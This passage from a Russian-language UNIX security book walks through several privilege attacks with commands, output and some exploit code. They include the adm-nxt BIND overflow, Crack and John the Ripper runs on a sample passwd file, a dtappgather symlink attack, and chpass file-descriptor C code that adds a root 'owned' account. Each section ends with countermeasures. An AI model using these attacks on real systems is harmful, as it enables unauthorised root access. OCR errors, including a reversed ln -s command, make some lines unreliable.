    Для проведения такой атаки взломщик должен контролировать сервер DNS, связанный с удаленным доменом. На этом сервере DNS взломщику необходимо также создать поддомен, связанный с его собственным доменом. В данном примере предполагается, что сетью взломщика является attackers.org, поддомен называется hash и сервер DNS запущен на узле с именем quake. В данном случае взломщику необходимо добавить в файл /var /named/attackers, org. zone узла quake следующую запись, а затем перезапустить программу named с помощью интерфейса ndc.
    subdomain  IN  NS hash.attaokers.org.
    Помните о том, что сервер DNS, контролируемый взломщиком, запущен на узле quake.
    После компиляции утилиты взлома, созданной группой ADM (http: //packet storm.securify.com/9911-exploits/adm-nxt.с), ее нужно запустить с отдельного узла (tsunami), имеющего корректную архитектуру. Поскольку программа named используется в многих версиях UNIX, то утилитой adm-nxt поддерживаются следующие архитектуры.

    [tsunami]# adm-nxt
    Usage: adm-nxt architecture [command]
    Available architectures:
    1: Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)
    2: Linux SolarDiz's non-exec
    stack patch - named 8.2/8.2.1
    3: Solaris 7 (Oxff) - named 8.2.1
    4: Solaris 2.6 - named 8.2.1
    5: FreeBSD 3.2-RELEASE - named 8.2
    6: OpenBSD 2.5 - named 8.2
    7: NetBSD 1.4.1 - named 8.2.1

    После проведения предварительного сбора данных с использованием утилиты шпар стало известно, что на удаленном узле используется система Red Hat 6.x. Таким образом, для утилиты adm-nxt необходимо задать режим 1.
    [tsunami]# adm-nxt 1
    После запуска утилита adm-nxt свяжется с UDP-портом 53 узла tsunami и будет ожидать установки соединения с уязвимым сервером имен. На этом узле не нужно запускать реальный сервер DNS, в противном случае утилита adm-nxt не сможет связаться с портом 53. Не забывайте о том, что работа утилиты adm-nxt основывается на наличии целевого сервера имен, соединенного (или запрашивающего) с ложным сервером DNS, который на самом деле представляет собой утилиту взлома, прослушивающую UDP-порт 53. Как же взломщик может это реализовать? Очень просто. Для этого достаточно передать целевому серверу DNS запрос на получение некоторых данных с использованием команды nslookup.

    [quake]# nslookup
    Default Server:localhost.attackers.org
    Address: 127.0.0.1
    > server 10.1.1.100
    Default Server: dns.victim.net
    Address: 10.1.1.100 >
    hash.attackers.org
    Server: dns.victim.net
    Address: 10.1.1.100

    Как видно из приведенного листинга, взломщик запустил команду nslookup в интерактивном режиме на отдельном компьютере, находящемся в его полном распоряжении. Затем он перешел от использования сервера DNS, заданного по умолчанию, к
    серверу-жертве с адресом 10.1.1.100. И наконец, взломщик запросил у взламываемого сервера DNS адрес поддомена hash.attackers.org. Это, в свою очередь, приведет к тому, что сервер dns.victim.net сгенерирует запрос к ложному серверу DNS, который прослушивает USP-порт 53. Как только целевой сервер установит соединение с узлом tsunami, на узле dns.victim.net утилитой adm-nxt будет сгенерировано переполнение буфера, в результате чего взломщик получит неограниченный доступ с привилегиями root, как показано ниже.

    [tsunami]# t666 I
    Received request from 10.1.1.100:53 for hash.attackers.org type=l
    id
    uid=0(root) gid=0(root) groups=0(root)

    Контрмеры: защита службы DNS



    Первое и самое главное — отключите и удалите пакет BIND на всех узлах, которые не используются в качестве сервера DNS. Во многих версиях системы UNIX (особенно Linux) программа named автоматически запускается при начальной загрузке компьютера, несмотря на то, что она никогда не используется. Во-вторых, удостоверьтесь в том, что используется текущая версия пакета BIND, в состав которой входят модули обновления подсистемы защиты (www.bind.org). В-третьих, запускайте программу named с правами непривилегированного пользователя. Другими словами, программа named должна запускаться с привилегиями root только для связывания с портом 53. После этого эти привилегии нужно понизить с использованием параметра -u (named -и dns -g dns). И наконец, программа named должна запускаться с использованием параметра -t из среды chrooted() (named -u dns -g dns -t /home/dns). Это поможет предотвратить попытки взломщика, связанные с обходом файловой системы и в том случае, если им был получен доступ. Даже если все перечисленные меры защиты решат поставленную задачу, не стоит успокаиваться на достигнутом. Безопасности сервера DNS необходимо постоянно уделять самое пристальное внимание.


    2.gif

    Изображение: 

    3.gif

    Изображение: 

    10. Локальный доступ



    Локальный доступ


    Итак, мы рассмотрели общие принципы получения удаленного доступа. Как уже упоминалось выше, большинство взломщиков, используя изъяны в защите средств удаленного доступа, стремятся получить локальный доступ. Если злоумышленнику удается получить интерактивный доступ к командной оболочке, он рассматривается системой как локальный пользователь. Хотя при удаленном взломе в некоторых случаях злоумышленникам удается сразу же получить доступ к компьютеру в качестве суперпользователя root, в большинстве случаев им приходится начинать с доступа в качестве обычного пользователя. Таким образом, взломщик должен заняться деятельностью, призванной расширить его полномочия от простого пользователя до суперпользователя. Эта деятельность называется расширением полномочий (privilege escalation). Сложность методики расширения полномочий зависит как от типа и версии используемой операционной системы, так и от качества ее настройки на конкретном компьютере. Некоторые операционные системы по умолчанию принимают все меры, препятствующие обычным пользователям расширять полномоия до уровня суперпользователя root, тогда как другие позволяют это делать. Например, пользователю операционной системы OpenBSD, установленной с параметрами настройки, принятыми по умолчанию, значительно сложнее расширить свои полномочия до уровня root, чем, скажем, пользователю операционной системы Irix. Конечно, индивидуальная настройка может значительно повысить уровень общей безопасности системы. В следующем разделе этой главы будут рассматриваться методы, позволяющие обычному пользователю получить доступ к системе на уровне суперпользователя. Необходимо заметить, что, хотя для большинства взломщиков типичным является поведение, заключающееся в попытках получить доступ на уровне root, в некоторых случаях у злоумышленника может не быть такой необходимости. Например, если взломщика интересует получение доступа к базе данных Oracle, то ему, скорее всего, достаточно будет получить доступ к учетной записи, под которой работает Oracle, а не к учетной записи root.

    Поиск неправильно выбранных паролей



    Как уже отмечалось выше, после того, как взломщику удалось получить доступ, самую большую угрозу для безопасности представляют собой легко угадываемые пароли. Не имеет значения, идет ли речь об удаленном или локальном доступе — неправильно выбранные пароли представляют собой одно из самых слабых мест системы защиты. Ввиду того что выше мы уже указывали на основные проблемы, связанные с выбором паролей, здесь мы остановимся в основном на изучении методов взлома.
    Взлом пароля часто заключается в использовании процедуры, называемой автоматизированный взлом с помощью словаря (automated dictionary attack). Взлом простым перебором (brute force attack) чаше всего рассматривается как метод активного взлома, тогда как автоматизированный взлом с помощью словаря может происходить без наличия соединения и является пассивным. Чаще всего этот метод взлома используется именно при наличии локального доступа, поскольку злоумышленнику необходимо получить доступ к файлу /etc/passwd или файлу паролей /etc/shadow. Иногда удается получить копию такого файла и при удаленном доступе (например, с использованием протоколов TFTP или HTTP). Однако, на наш взгляд, лучше всего рассматривать взлом паролей именно как один из методов локального взлома. Он отличается от метода взлома простым перебором тем, что в данном случае злоумышленник при подборе пароля не пытается получить доступ к службе, работающей на уровне полномочий суперпользователя, или воспользоваться командой su. Вместо этого он пытается подобрать пароль к определенной учетной записи, шифруя различные слова или случайным образом сгенерированный текст и сравнивая результаты с зашифрованным паролем, полученным из файла паролей.
    Если хэш-код зашифрованного пароля соответствует хэш-коду, сгенерированному программой взлома, значит, пароль успешно взломан. Как видите, в этом процессе нет ничего сложного, — если вы знаете две составляющие из трех, вы можете вычислить недостающие данные. Нам либо известно слово из словаря часто используемых паролей, либо известен случайным образом сгенерированный текст (назовем такие слово или текст исходными данными). Мы также знаем алгоритм хэширования (обычно для этого используется стандарт DES — Data Encryption Standard). Таким образом, если хэш-код исходных данных, полученный путем применения заданного алгоритма, соответствует хэш-коду пароля определенного пользователя, значит, в качестве исходных данных мы использовали текст, являющийся паролем этого пользователя. Этот процесс показан на рис. 8.4.



    Рис. 8.4. Процесс подбора пароля

    Из всего многообразия программ, предназначенных для взлома паролей, можно выделить Crack 5.0а Алека Маффета (Alec Muffett) и John the Ripper. Программа Crack 5.0л, которую для краткости мы будем называть просто Crack, является, пожалуй, самой популярной программой взлома паролей. К тому же она постоянно совершенствуется, а ее весьма обширный словарь, содержащий очень широкий спектр возможных паролей — от ненормативной лексики до названий из сериала Star Trek, — постоянно пополняется. Crack поддерживает даже возможность распределения вычислений, предназначенных для взлома пароля, на нескольких компьютерах. Программа John the Ripper, или просто John, является более новой, чем Crack 5.0a. Ее отличительная особенность заключается в высокой степени оптимизации для взлома максимально возможного количества паролей за минимальное время. Кроме того, John поддерживает больше алгоритмов хэширования, чем Crack. Обе программы позволяют проверять не только слова, находящиеся в словаре, но и их модификации. По умолчанию в состав каждого из этих двух инструментов входит более 2400 правил, которые можно применить к словарю для подбора паролей, которые, казалось бы, очень трудно взломать. В комплект поставки обеих программ входит обширная документация, с которой мы настоятельно рекомендуем ознакомится. Чтобы не рассматривать все возможные параметры и режимы работы этих программ, мы покажем, как запустить Crack на выполнение и прокомментируем полученные результаты. Для этого вам необходимо знать структуру файла паролей. Если вы недостаточно владеете данным вопросом, обратитесь к хорошей книге по UNIX.

    Crack 5.0a



    Для того чтобы запустить программу Crack, достаточно указать, где находится файл паролей, а затем лишь дождаться результата. Crack является самокомпилирующейся программой, поэтому после запуска на самом деле вызывается утилита make, которая собирает воедино все необходимые компоненты. Одной из сильных сторон программы Crack является обширный набор правил создания различных словоформ и модификаций. Кроме того, при каждом запуске эта программа генерирует пользовательский список слов, в который включается такая информация, как имя пользователя, а также сведения, указанные в поле GECOS (комментарии). Именно поэтому не забывайте посмотреть на поле GECOS при взломе паролей! Очень часто в поле GECOS пользователи указывают свое полное имя и при этом выбирают пароль, который представляет собой некоторую комбинацию имени и фамилии или их частей. Программа Crack очень легко справляется с такими несложными паролями. Давайте посмотрим как выглядит типичный файл паролей, а затем попробуем применить к нему программу взлома.

    root:cwIBREDaWLHmo:0:0:root:/root:/bin/bash
    bin:*:l:l:bin:/bin:
    daemon:*:2:2:daemon:/sbin:
    <other locked accounts omitted>
    nobody:*:9 9:9 9:Nobody:/:

    eric:GmTFgOAavFAOU:500:0:
    :/home/eric:/bin/csh
    samantha:XaDeasK8g8g3s:501:503:
    :/home/samantha:/bin/bash
    temp:kRWegG5iTZP5o:502:506:
    :/home/temp:/bin/bash
    hackme:nh.StBNcQnyE2:504:1:
    :/home/hackme:/bin/bash
    bob:9wynbWzXinBQ6:506:1::/home/bob:/bin/csh
    es:OxOH89TiymLcc:501:501::/home/es:/bin/bash
    mother:jxZdltcz3wW2Q:505:505:
    :/home/mother:/bin/bash
    jfr:kyzKROryhFDE2:506:506:
    :/home/jfr:/bin/bash

    Для того чтобы запустить программу Crack для взлома данного файла, необходимо воспользоваться следующей командой.

    [tsunamitt Crack passwd
    Crack 5.0a: The Password Cracker.
    (c) Alec Muffett, 1991, 1992, 1993, 1994, 1995, 1996
    System: Linux 2.0.36
    #1 Tue Oct 13 22:17:11 EOT 1998 1686 unknown
    <omitted for brevity>
    Crack: The dictionaries seem up to date...
    Crack: Sorting out and merging feedback, please be patient...
    Crack: Merging password files...
    Crack: Creating gecos-derived dictionaries
    mkgecosd: making non-permuted words dictionary
    mkgecosd: making permuted words dictionary
    Crack: launching: cracker -kill run/system.11324
    Done

    Начиная с этого момента программа Crack переходит к функционированию в фоновом режиме с сохранением результатов в базе данных. Для того чтобы обратиться к этой базе данных и узнать, какие пароли были взломаны, необходимо запустить утилиту Reporter.

    [tsunami]# Reporter -quiet
    ---passwords cracked as of Sat 13:09:50 EOT ---
    Guessed eric [jenny] [passwd /bin/csh]
    Guessed hackme [hackme] [passwd /bin/bash]
    Guessed temp [temp] [passwd /bin/bash]
    Guessed es [eses] [passwd /bin/bash]
    Guessed jfr [solarisl] [passwd /bin/bash]

    Если вы хотите увидеть только пароли, взломанные к текущему моменту, необходимо запустить профамму Reporter с параметром -quiet. При запуске утилиты без параметров на экран выводятся сведения об ошибках, предупреждения, а также сведения о заблокированных паролях. В комплект поставки профаммы Crack входит еще и несколько очень полезных сценариев. Один из них — shadmrg. sv. Он предназначен для объединения файла паролей UNIX со скрытым файлом паролей, что позволяет получить один исходный файл, содержащий всю информацию, необходимую для взлома паролей. Еще одной интересной командой является команда make tidy, с помощью которой можно удалить остаточные учетные пользовательские записи и пароли после выполнения Crack.
    В завершение необходимо рассмотреть еще один вопрос: как определить используемый алгоритм хэширования? В нашем примере использовался алгоритм DES, являющийся стандартным в большинстве версий UNIX. Если в системе установлены дополнительные средства обеспечения безопасности, то тогда, скорее всего, будут применяться алгоритмы MD5 и blowfish. Хэш-код пароля, полученный с помощью MD5, значительно длиннее хэш-кода DES и идентифицируется наличием символов $1 в качестве двух первых символов хэш-кода. Символы $2, содержащиеся в начале хэш-кода, говорят о том, что для хэширования использовался алгоритм blowfish. Если вам нужна программа для взлома паролей, защищенных с помощью MD5 или blowfish, мы настоятельно рекомендуем использовать John the Ripper.

    John the Ripper



    John the Ripper — одна из лучших утилит взлома паролей, доступных в настоящее время. Ее версии как для UNIX, так и для NT можно найти по адресу http://www.openwall.com/john/. Как уже упоминалось, программа John является одной из лучших и самых быстрых утилит и она очень проста в применении.

    [shadow]# John passwd
    Loaded 9 passwords with 9 different salts (Standard DES [24/32 4K])
    hackme (hackme)
    temp (temp)
    eses (es)
    jenny (eric)
    tlB (bob)
    guesses: 5 time: 0:00:04:26 (3)
    c/s: 16278 trying: pireth - StUACT

    На вход утилиты John при запуске подается файл паролей (passwd), и это все, что нужно сделать. Утилита самостоятельно определит применяемый алгоритм шифрования, в данном случае DES, а затем приступит к взлому паролей. Сначала будет использован файл словаря (password. 1st), а затем начнется процесс подбора паролей. Как видно из приведенного листинга, утилитой John был получен пароль пользователя job, тогда как программе Crack удалось подобрать пароль пользователя j f г. Так что с помощью каждой программы были получены различные результаты. В основном это объясняется ограниченным списком слов, содержащимся в файле словаря \тили-ты John, так что мы рекомендуем его расширить. Обширный список слов можно найти ПО адресу http://packetstorm.securify.com/Crackers/wordlists/.

    Контрмеры: защита от взлома неправильно выбранных паролей



    Контрмеры, позволяющие защитить систему от попыток взлома неправильно выбранных паролей, приведены в разделе "Защита От Подбора Паролей "В Лоб"" выше в данной главе.

    Локальное переполнение буфера



    Взлом путем локального переполнения буфера — один из самых популярных видов атак. Как уже упоминалось выше в этой главе в разделе "Удаленный Доступ", используя переполнение буфера, взломщик может запустить на интересующей его системе произвольный код или команду. В большинстве случаев переполнение буфера применяется для взлома файлов, работающих в контексте SUID суперпользователя, что обеспечивает злоумышленнику возможность запуска команд с привилегиями root. Выше в разделе "Взлом Путем Переполнения Буфера" этой главы мы уже рассматривали, как при возникновении переполнения буфера можно выполнить произвольный код. В этом разделе мы на нескольких примерах рассмотрим, как происходит типичный взлом путем локального переполнения буфера.
    В мае 1999 года группа Shadow Penguin Security обнародовала информацию о состоянии переполнения буфера в библиотеке libc, которое связано с переменной окружения LC_MESSAGES. Любая программа SUID, которая динамически компонуется с этой библиотекой и использует переменную окружения LC_MESSAGES, представляет собой объект для взлома путем переполнения буфера. Поскольку данная ошибка связана с использованием системной библиотеки, в отличие от рассматривавшихся ранее примеров, она проявляется не в одной программе, а в нескольких. Эта особенность очень важна и является одной из причин, по которой мы выбрали данный пример, потому что в случае возникновения переполнения буфера в системной библиотеке можно взломать очень много программ, использующих эту библиотеку. Давайте посмотрим, как этот подход выглядит на практике.
    Прежде всего, необходимо скомпилировать саму программу взлома (exploit). В некоторых случаях понадобится подкорректировать исходный код. Этот процесс может оказаться достаточно длительным, поскольку иногда требуется очень тонкая настройка, зависящая от платформы. Рассматриваемая в данном случае программа написана для системы Solaris 2.6 и 2.7. Для ее компиляции мы использовали бесплатный компилятор GNU gcc, так как в комплект поставки Solaris по умолчанию компилятор не входит. Его нужно приобретать отдельно. Файл с исходным текстом имеет расширение . с, а исполняемый файл сохраняется под именем ex_lobc с помощью параметра -о компилятора. [quake]$ gcc ex_lobc.c -о ех_1оbс
    Теперь остается лишь запустить на выполнение программу ex_lobc, которая приведет к переполнению буфера в libc посредством обращения к какой-либо программе SUID, например /bin/passwd.

    [quake]$ ./ex_lobc
     jumping address : efffe7a8 #

    Итак, программа взлома перешла к заданному адресу памяти, в результате чего оболочка /bin/sh запустилась с привилегиями суперпользователя, о чем говорит символ # в строке приглашения. Данный пример очень прост и дает возможность любому почувствовать себя экспертом в вопросах безопасности. На самом деле участники группы Shadow Penguin Security проделали колоссальную работу, чтобы найти данный изъян и написать соответствующую программу. Как легко догадаться, простота получения доступа на уровне суперпользователя — это основная притягательная сила, побуждающая взломщиков использовать программы, приводящие к локальному переполнению буфера.

    Контрмеры: защита от локального переполнение буфера



    Лучшим методом зашиты от локального переполнения буфера является учет требований безопасности в процессе программирования, а также включение режима, запрещающего выполнение кода, находящегося в стеке. Достаточно выполнить хотя бы последнее требование, чтобы значительно усложнить работу злоумышленника, который попытается написать программу, использующую только что рассмотренный изъян. Полный перечень контрмер приведен в разделе "Взлом Путем Переполнения Буфера" данной главы. Здесь мы лишь добавим, что очень хорошей практикой является установка бита SUID только для тех программ, которым действительно необходим доступ на уровне суперпользователя.

    Символьные ссылки



    Устаревшие, рабочие и временные файлы в той или иной степени "захламляют" большинство систем. К счастью, в UNIX большинство временных файлов создается в одном каталоге /tmp. Однако, хотя, с одной стороны, это и удобно, с другой — несет в себе определенную опасность. Многие программы, работающие в контексте SUID суперпользователя, создают рабочие файлы в каталоге /tmp или других подобных каталогах даже без намека на какую-либо проверку соблюдения правил безопасности. Основная проблема связана с использованием некоторыми программами при доступе к файлам символьных ссылок без проверки того, является ли тот или иной файл ссылкой или же реальным файлом. Символьная ссшка (symbolic link) — это файл специального вида, созданный с помощью команды In. По сути, такой файл представляет собой не что иное, как ссылку на другой файл. Давайте, например, создадим символьную ссылку /tmp/fоо на файл /etc/passwd.
    [quake]$ In -s /tmp/foo /eto/passwd
    Теперь, применив команду cat к файлу /tmp/foo, мы получим содержимое не этого файла, а файла паролей! Таким образом, кажущееся на первый взгляд удобным, это средство представляет весьма реальную угрозу для безопасности. Хотя подобным образом обычно осуществляется доступ к рабочим файлам, помещенным в каталог /tmp, некоторые приложения создают подобные файлы и в любых других каталогах файловой системы. Давайте рассмотрим пример из реальной жизни и разберемся, как этот метод применяется на практике.
    В этом примере мы будем изучать утилиту взлома dtappgather из операционной системы Solaris. Данная утилита поставляется в составе стандартного рабочего стола. При каждом выполнении dtappgather создает временный файл с именем /var/dt/appconfig/appmanager/generic-display-0 и устанавливает к нему права доступа 0666. Кроме того, она изменяет атрибут принадлежности файла в соответствии с UID пользователя, который запустил эту утилиту на выполнение. К сожалению, утилита dtappgather не применяет никаких процедур проверки для того, чтобы удостовериться, не подменен ли созданный ею временный файл символьной ссылкой. Таким образом, если взломщик создаст символьную ссылку /var/dt/appconfig/appmanager/generic-display-0, указывающую на другой файл (например, на /etc/passwd), права доступа к последнему изменятся на 0666, а его владельцем станет взломщик. Перед запуском программы давайте убедимся, в том что владельцем файла /etc/passwd является суперпользователь root, а права установлены на уровне группы sys.

    [quake]$ 1s -1 /etc/passwd
    -r-xr-xr-x 1 root sys 560 May 5 22:36 /etc/passwd

    Теперь создадим символьную ссылку /var/dt/appconfig/appmanager/generic-display-0, указывающую на файл /etc/passwd.

    [quake]$ In -s /etc/passwd /var/dt/appconfig/
    appmanager/generic-display-0

    Наконец, запустим утилиту dtappgather, а затем проверим права доступа к файлу /etc/passwd.

    [quake]$ /usr/dt/bin/dtappgather
    MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File
    exists
    [quake]$ Is -1 /etc/passwd
    -r-xr-xr-x 1 gk staff 560 May 5 22:36 /etc/passwd

    Итак, утилита dtappgather "бездумно" воспользовалась созданной нами символьной ссылкой и изменила владельца и права доступа к файлу /etc/passwd. Теперь то же самое нужно проделать для файла /etc/shadow. После того как изменены владельцы файлов /etc/shadow и /etc/passwd, можно модифицировать эти файлы и добавить в них учетную запись с UID 0 (эквивалент суперпользователя). И на все это уйдет не больше минуты!

    Контрмеры: защита от взлома с использованием символьных ссылок



    В данном случае самой лучшей защитой является программирование с учетом требований безопасности. К сожалению, алгоритмы многих программ не предусматривают проведение профилактической проверки уже созданных файлов. Прежде чем создавать файл, программист должен проверить его существование, воспользовавшись флагами O_EXCL | O_CREAT. При создании временных файлов задайте маску с помощью команды umask, а затем воспользуйтесь функциями tmpfileO или mktemp (). Если вам действительно интересно знать, какими программами создаются временные файлы, воспользуйтесь следующей командой в каталоге /bin или /usr/sbin/.
    [quake]$ strings * |grep tmp
    Если программа выполняется в контексте SUID, то она представляет собой потенциальную угрозу, поскольку может использоваться взломщиком для получения несанкционированного доступа путем создания символьной ссылки. Как уже неоднократно рекомендовалось, сбросьте бит SUID у максимально возможного количества файлов, чтобы свести риск к минимуму. Наконец, можно воспользоваться инструментальным средством, например, таким как LOpht Watch, которое наблюдает за каталогом /tmp и информирует о создании в нем временных файлов. Утилиту LOpht Watch можно найти по адресу http://www.L0pht.com/advisories/10pht-watch. tar .gz.

    Взлом с помощью дескриптора файла



    Дескрипторы файлов (file descriptor) — это неотрицательные целые числа, которые используются системой для управления файлами. Дескрипторы позволяют облегчить работу операционной системы, устраняя необходимость манипуляции именами файлов. В соответствии с принятыми соглашениями, дескрипторы 0, 1 и 2 определяют стандартный входной поток, стандартный выходной поток и стандартный поток ошибок соответственно. Таким образом, когда функции ядра открывают существующий файл или создают новый, они возвращают определенный дескриптор, который может использоваться программой для выполнения над этим файлом операций чтения/записи. Если дескриптор соответствует файлу, который был открыт для чтения и записи (O_RDWR) привилегированным процессом, то во время модификации этого файла взломщик может получить к нему доступ и произвести в него запись. Таким образом, с помощью этого метода можно модифицировать один из важных системных файлов и получить доступ на уровне суперпользователя.
    Достаточно неожиданно, что даже такая надежная система, как OpenBSD версии 2.3, была подвержена взлому с помощью дескриптора файла. Оливер Фридрихе (Oliver Friedrichs) установил, что команда chpass, применяемая для модификации некоторой информации, хранящейся в файле паролей, некорректно обрабатывала дескрипторы файлов. При запуске chpass создавался временный файл, который мог модифицировать любой пользователь с помощью какого-нибудь текстового редактора. Любые изменения снова заносились в базу данных паролей, как только пользователь закрывал редактор. К сожалению, если взломщик выполнял временный выход в командную оболочку, то порождался дочерний процесс, имеющий права доступа на чтение/запись дескрипторов файлов родительского процесса. Взломщику оставалось лишь модифицировать временный файл (/tmp/ptmp), созданный командой chpass, добавив в него учетную запись с UID 0 без пароля. Как только он, вернувшись в редактор, закрывал его, все изменения немедленно заносились в файл /etc/master.passwd. После этого для получения доступа в качестве суперпользователя взломщику оставалось лишь воспользоваться только что созданной учетной записью. Давайте посмотрим, как это можно выполнить на практике.
    Сначала изменим используемый по умолчанию редактор на vi, поскольку во время работы он позволяет получить доступ к командной строке. [dinky]$ export EDITOR=vi
    Затем запускаем программу chpass. [dinky]$ /usr/bin/chpass
    Это, в свою очередь, приведет к запуску vi с открытием информации из базы данных текущего пользователя.

    #Chanqing user database information for gk.
    Shell: /bin/sh
    Full Name: grk
    Location:
    Office Phone:
    Home Phone: blah

    Теперь на время выйдем из редактора vi в командную оболочку, воспользовавшись для этого командой ! sh.
    Теперь только что запущенная командная оболочка имеет унаследованный доступ к дескриптору открытого файла. Воспользуемся описанным подходом и добавим в файл паролей учетную запись с UID 0.

    [dinky]$ nohup ./chpass &
    [1] 24619
    $ sending output to nohup.out
    [1] + Done nohup ./chpass
    [dinky]$ exit
    Press any key to continue
    [: to enter more ex commands]:
    /etc/pw.F26119: 6 lines, 117 characters.
    [dinky]$ su owned
    [dinky]# id
    uid=0(owned) gid=0(wheel) groups=0(wheel)

    Как только мы воспользовались командой su и учетной записью owned, мы получили доступ на уровне суперпользователя. Весь описанный процесс можно воплотить всего лишь в нескольких строках кода.

    int
    main () {
    FILE *f;
    int count; f = fdopen (FDTOUSE, "a");
    for (count = 0; count != 30000; count++)
    fprintf (f, "owned::0:0::0:0:OWNED,,,:/tmp:/bin/bash\n");
    exit (0) ; }

    Этот код предоставлен Марком Зелинским (Mark Zielinski).

    Контрмеры: защита от взлома с помощью дескриптора файла



    Разработчики программ, предназначенных для работы в контексте SUID, должны следить за корректностью распределения дескрипторов файлов. В частности, при системном вызове execveO необходимо устанавливать флаг close-on-exec. Как уже упоминалось выше, необходимо также сбросить бит SUID у всех программ, для которых его устанавливать необязательно.

    Гонки на выживание



    В реальной жизни хищник нападает на жертву, когда она наименее защищена. В ки-берпространстве эта аксиома также имеет место. Компьютерные взломщики, как правило, стремятся воспользоваться недостатками в системе защиты программы или процесса при выполнении ими какой-нибудь привилегированной операции. Обычно при этом время взлома-планируется таким образом, чтобы повредить программу или процесс после того, как они перейдут в привилегированный режим, но до завершения использования привилегированных прав. В большинстве случаев этот временной интервал достаточно ограничен, поэтому взломщикам нужно очень хорошо рассчитать момент нападения, чтобы успеть вовремя скрыться со своей добычей. Недостаток системы защиты, позволяющий злоумышленнику установить факт наличия такого временного интервала, называется состоянием гонки на выживание (race condition). Если взломщику удается вмешаться в нор-мальную работу в то время, когда процесс или программа находится в привилегированном состоянии, то говорят о том, что он "выигрывает гонку" (winning the race). Состояние гонки на выживание может быть различных типов. Мы ограничимся описанием тех из них, которые связаны с обработкой сигналов.

    Проблемы обработки сигналов



    В системе UNIX сигналы (signal) обеспечивают механизм, используемый для извещения процесса о том, что возникло какое-то определенное условие. Кроме того, с помощью сигналов обрабатываются асинхронные события. Например, когда пользователь хочет приостановить работу выполняющейся программы, он нажимает комбинацию клавиш <Ctrl-t-Z>. При этом всем активным процессам (foreground) рассылается сигнал SIGTSTP. Таким образом, с помощью сигналов изменяется ход выполнения программы. Как и раньше, выражение "изменяется ход выполнения программы" должно вызвать у вас мгновенную реакцию, так как такие действия обычно таят в себе угрозу для безопасности. Действительно, возможность влиять на ход выполнения работающей программы — одна из самых важных проблем в обеспечении безопасности обработки сигналов. Если бы дело ограничивалось лишь сигналом SIGTSTP, это было бы не столь критично, однако в действительности для подобных целей может использоваться свыше 30 сигналов, что, как вы понимаете, представляет собой сложную проблему.
    Примером взлома защиты с использованием обработки сигналов может послч'жить обнаруженный в конце 1996 года изъян в системе обработки сигналов программы wu-f tpd v2.4. Этот изъян позволял как обычным, так и анонимным пользователям получать доступ к файлам в качестве суперпользователя. Это оказалось возможным из-за ошибки в сервере FTP, связанной с обработкой сигналов. При запуске FTP-сервер устанавливал два обработчика сигналов. Первый из них использовался для обработки сигналов SIGPIPE при закрытии управляющего порта или порта данных, а второй — для обработки сигналов SIGURG, поступающих при обнаружении команды ABOR, предназначенной для аварийного прекращения передачи. Обычно, когда пользователь регистрируется на сервере FTP, сервер запускается в контексте действующего UID пользователя, а не на уровне суперпользователя. Однако если соединение, по которому передаются данные, неожиданно закрывается, FTP-серверу отправляется сигнал SIGPIPE, после чего FTP-сервер вызывает функцию dologouto и повышает свой уровень привилегий до уровня суперпользователя (UID 0)! Сервер добавляет в файл системного журнала запись об отключении пользователя, закрывает файл журнала xferlog, удаляет пользовательский экземпляр сервера из таблицы процессов и завершает свою работу. Именно в этот момент сервер и изменяет свой действующий UID на 0, что повышает уязвимость системы в случае взлома. Взломщик может отправить FTP-серверу сигнал SIGURG, пока его действующий UID равен 0, прервать сервер, когда он пытается отключить пользователя, а потом заставить его снова вернуться обратно в режим обработки поступающих команд. Таким образом, здесь можно говорить о возникновении гонки на выживание, поскольку взломщику необходимо успеть выдать сигнал SIGURG после того, как сервер изменит свой UID на 0, но до отключения пользователя. Если взломщику это удастся (пусть и не с первой попытки), он останется подключенным к FTP-серверу, но уже с полномочиями суперпользователя! Это позволит ему получить или отправить любой файл, а также выполнять команды с привилегиями root.

    Контрмеры: защита от взлома с помощью сигналов



    Когда речь идет о файлах SUID, корректная обработка сигналов должна быть обязательным требованием. Если программа перехватывает и обрабатывает сигналы надлежащим образом, конечный пользователь не сможет сделать ничего такого, что нарушило бы безопасность. Конечно, об этом должны позаботится программисты, а администратор прежде всего должен убедиться в том, что бит SUID установлен только для тех файлов, которым это действительно необходимо. Об этом уже неоднократно говорилось. Кроме того, нужно удостовериться в том, что установлены все модули обновления, предоставленные разработчиком операционной системы.

    Манипуляции с файлами дампов



    Возможность получения дампа (core file) при выполнении программы может привести гораздо к более серьезным последствиям, чем кажется на первый взгляд. Во время работы системы UNIX в памяти может находиться много важной информации, включая, например, хэш-коды паролей, считанные из скрытого файла паролей. Одним из примеров манипуляций с файлами дампов является изъян, имевший место в старых версиях FTPD. Сервер FTPD позволял взломщикам записать дамп оперативной памяти в общедоступный файл, размещаемый в корневом каталоге. Для этого перед подключением к серверу нужно было лишь передать команду PASV. Помимо прочего в файле дампа содержалась часть скрытого файла паролей и в большинстве случаев хэш-коды пользовательских паролей. Если взломщику удавалось найти эти коды в файле дампа, он получал возможность взломать привилегированную учетную запись и получить доступ к системе на уровне суперпользователя.

    Контрмеры: защита от взлома с помощью файлов дампов



    Файлы дампов — это неизбежное зло. Несмотря на то что они могут предоставить взломщику конфиденциальную информацию, они также обеспечивают получение не менее важной информации и системному администратору в тех случаях, когда выполнение программы завершается аварийно. Если того требуют ваши правила обеспечения безопасности, можно ограничить генерацию файлов дампов с помощью команды ulimit и даже полностью отключить ее, установив ulimit равным 0 в системном профиле. Более подробную информацию по команде ulimit вы найдете в интерактивной справочной системе.

    [tsunami]$ ulimit -a
    core file size (blocks) unlimited
    [tsunami]? ulimit -с 0
    [tsunami]$ ulimit -a
    core file size (blocks)0

    Совместно используемые библиотеки



    Совместно используемые библиотеки (shared library) позволяют исполняемым файлам обращаться к функциям общего назначения во время выполнения. Соответствующий программный код заранее компилируется, а затем помещается в ту или иную совместно используемую библиотеку. При запуске программы, которой нужна какая-то функция, находящаяся в такой библиотеке, программа обращается к этой библиотеке, загружает в память нужный код и выполняет его. Главным преимуществом таких библиотек является экономия дискового пространства и оперативной памяти, а также упрощение сопровождения программ, так как обновление библиотеки автоматически влечет за собой обновление функциональности всех работающих с ней программ. Конечно, за повышенное удобство приходится расплачиваться ослаблением безопасности. Если взломщику удастся модифицировать совместно используемую библиотеку или с помощью переменных окружения ему удастся переключить программы на применение своей собственной библиотеки, это может привести к получению им доступа на уровне суперпользователя.
